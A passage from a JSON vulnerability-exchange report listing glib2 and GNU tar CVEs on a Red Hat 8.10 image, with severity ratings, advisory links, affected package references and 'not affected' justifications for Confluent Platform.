          "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00030.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29499"
        },
        {
          "url": "https://security.gentoo.org/glsa/202311-18"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231103-0001/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-29499"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-17T05:50:13+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-32611",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in GLib. GVariant deserialization is vulnerable to a slowdown issue where a crafted GVariant can cause excessive processing, leading to denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32611"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32611"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2211829"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2797"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32611.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00030.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32611"
        },
        {
          "url": "https://security.gentoo.org/glsa/202311-18"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231027-0005/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32611"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-23T18:17:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-32636",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400,
        502
      ],
      "description": "A flaw was found in glib, where the gvariant deserialization code is vulnerable to a denial of service introduced by additional input validation added to resolve CVE-2023-29499. The offset table validation may be very slow. This bug does not affect any released version of glib but does affect glib distributors who followed the guidance of glib developers to backport the initial fix for CVE-2023-29499.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32636"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32636"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2841"
        },
        {
          "url": "https://https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32636.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32636"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231110-0002/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32636"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-17T05:59:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-32665",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400,
        502
      ],
      "description": "A flaw was found in GLib. GVariant deserialization is vulnerable to an exponential blowup issue where a crafted GVariant can cause excessive processing, leading to denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32665"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32665"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2211827"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2121"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32665.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00030.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32665"
        },
        {
          "url": "https://security.gentoo.org/glsa/202311-18"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240426-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32665"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-17T05:59:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-39804",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "In GNU tar before 1.35, mishandled extension attributes in a PAX archive can lead to an application crash in xheader.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-39804"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-39804"
        },
        {
          "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1058079"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00008.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39804"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-39804"
        }
      ],
      "published": "2024-03-27T04:15:08+00:00",
      "updated": "2026-06-17T06:12:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
